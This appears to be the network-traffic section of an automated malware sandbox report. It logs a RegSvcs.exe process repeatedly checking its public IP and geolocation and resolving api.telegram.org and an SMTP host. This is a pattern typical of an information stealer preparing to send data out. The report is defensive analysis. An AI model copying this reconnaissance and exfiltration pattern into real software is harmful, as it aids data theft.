Nov 20, 2024 10:14:05.833785057 CET	587	49754	188.128.134.93	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2024 10:12:00.815665960 CET	53959	53	192.168.2.4	1.1.1.1
Nov 20, 2024 10:12:00.824335098 CET	53	53959	1.1.1.1	192.168.2.4
Nov 20, 2024 10:12:03.707660913 CET	52513	53	192.168.2.4	1.1.1.1
Nov 20, 2024 10:12:03.715310097 CET	53	52513	1.1.1.1	192.168.2.4
Nov 20, 2024 10:12:19.114428997 CET	65497	53	192.168.2.4	1.1.1.1
Nov 20, 2024 10:12:19.121409893 CET	53	65497	1.1.1.1	192.168.2.4
Nov 20, 2024 10:12:25.604258060 CET	60462	53	192.168.2.4	1.1.1.1
Nov 20, 2024 10:12:25.614367008 CET	53	60462	1.1.1.1	192.168.2.4
Nov 20, 2024 10:12:43.188745022 CET	53	58567	162.159.36.2	192.168.2.4
Nov 20, 2024 10:12:43.699719906 CET	53	54059	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 20, 2024 10:12:00.815665960 CET	192.168.2.4	1.1.1.1	0xab84	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:12:03.707660913 CET	192.168.2.4	1.1.1.1	0xd478	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:12:19.114428997 CET	192.168.2.4	1.1.1.1	0x8290	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:12:25.604258060 CET	192.168.2.4	1.1.1.1	0xa8b9	Standard query (0)	panta.home.pl	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 20, 2024 10:12:00.824335098 CET	1.1.1.1	192.168.2.4	0xab84	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 20, 2024 10:12:00.824335098 CET	1.1.1.1	192.168.2.4	0xab84	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:12:00.824335098 CET	1.1.1.1	192.168.2.4	0xab84	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:12:00.824335098 CET	1.1.1.1	192.168.2.4	0xab84	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:12:00.824335098 CET	1.1.1.1	192.168.2.4	0xab84	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:12:00.824335098 CET	1.1.1.1	192.168.2.4	0xab84	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:12:03.715310097 CET	1.1.1.1	192.168.2.4	0xd478	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:12:03.715310097 CET	1.1.1.1	192.168.2.4	0xd478	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:12:19.121409893 CET	1.1.1.1	192.168.2.4	0x8290	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:12:25.614367008 CET	1.1.1.1	192.168.2.4	0xa8b9	No error (0)	panta.home.pl		188.128.134.93	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	132.226.247.73	80	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:00.889869928 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 10:12:01.583122015 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:12:01 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 38846acc763d6f37a20649ff60dd764c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 20, 2024 10:12:01.589139938 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 20, 2024 10:12:03.657114983 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:12:03 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1b5a5e00bdeece1f35c1c46e85f6bb4d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 20, 2024 10:12:04.418096066 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 20, 2024 10:12:05.880707026 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:12:05 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8652fafa9449aa32f5c4dedf2db451f7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49733	132.226.247.73	80	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:06.628815889 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 20, 2024 10:12:08.267118931 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:12:08 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a2c6301c01d1f41b07cc6e64b46db522 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49735	132.226.247.73	80	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:08.902065039 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 10:12:10.578113079 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:12:10 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 22cb8a850057a446a4906e4c76303d38 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49737	132.226.247.73	80	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:11.212124109 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 10:12:12.497940063 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:12:12 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 78fa2035ccacb4bef29a4f44cfc0008e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49739	132.226.247.73	80	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:13.134474039 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 10:12:14.215956926 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:12:14 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 35413a7d57c9a955c7435c6ea8aee0d1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	132.226.247.73	80	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:14.820614100 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 10:12:15.506475925 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:12:15 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a325fbea6ba07aa23d63a90a069b5a3b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	132.226.247.73	80	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:16.143327951 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 10:12:16.840287924 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:12:16 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 471972c6e64934f26962fa9c000486bd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49749	132.226.247.73	80	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:17.742362976 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 10:12:18.419549942 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:12:18 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9cb16fc1cd1f8e2003fc48726f10d192 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	188.114.97.3	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 09:12:04 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-20 09:12:04 UTC	850	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:12:04 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 57833 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RmlFeP%2FGXXosmW9rF7Xjxo1Yw2atMep9pj6XfNb8SL7KJ8oPw%2FqxJTULf0KIKVQw38xIO5T6hP4TD%2Bgw5TwzYfllNMg7paraoHtoBpoL1bwo1wJvQaweKwQzIF5jaD4DSqaH2DFk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5750f32c2943bb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2405&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1214137&cwnd=228&unsent_bytes=0&cid=68ea3fbff25fb0aa&ts=226&x=0"
2024-11-20 09:12:04 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	188.114.97.3	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 09:12:06 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-20 09:12:06 UTC	856	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:12:06 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 57835 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h6yWfTVVFPNpFrk3kwIL4%2ByTzBEg5rofY22DH46O8F2kNuDPSWTaF0UX0I9LiC4E9Tw6gI%2FyJAtBO4plcTD%2FhC7zQSTtxgbv4kr1k2eRhTbBow%2B%2FJn1Cx5m%2FLG8P0SsZh2oWaKo4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e575100fd04c484-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1727&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1712609&cwnd=247&unsent_bytes=0&cid=ae4dd85176b5d231&ts=140&x=0"
2024-11-20 09:12:06 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	188.114.97.3	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 09:12:08 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-20 09:12:08 UTC	852	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:12:08 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 57837 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w6gbMTKSD2Cpn0xW756W7n4CsRPMNy2rcvhrnWN2qZjRSNuSpO9AjQ0ugNl7EwG07UZQLppK4SwrqIKXzdqUUffLSVV8yiRfNRehM%2Br2ai5AvG%2FepgL3gEwjVRTV%2Fo%2B6qeNJgy0m"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e57510f3e4a4303-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1632&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1798029&cwnd=252&unsent_bytes=0&cid=5bd556cf466dbc66&ts=153&x=0"
2024-11-20 09:12:08 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49736	188.114.97.3	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 09:12:11 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-20 09:12:11 UTC	856	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:12:11 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 57840 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E6pa7ZIgOxmI%2B3zVOxW580qxAadbhI1vsqBRz6dgOjUDMYvqafjgE3oAJK1AlDSsYaGKP%2BCE3AJRgA%2B3Cs7qhXb5uHbdECH5nW34171yYwLy%2BcdTPQCvTVTw4kyCPu%2BZy5jgd%2F7h"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e57511d98d75e62-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1555&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1803582&cwnd=150&unsent_bytes=0&cid=bef62ed5de532a71&ts=140&x=0"
2024-11-20 09:12:11 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49738	188.114.97.3	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 09:12:12 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
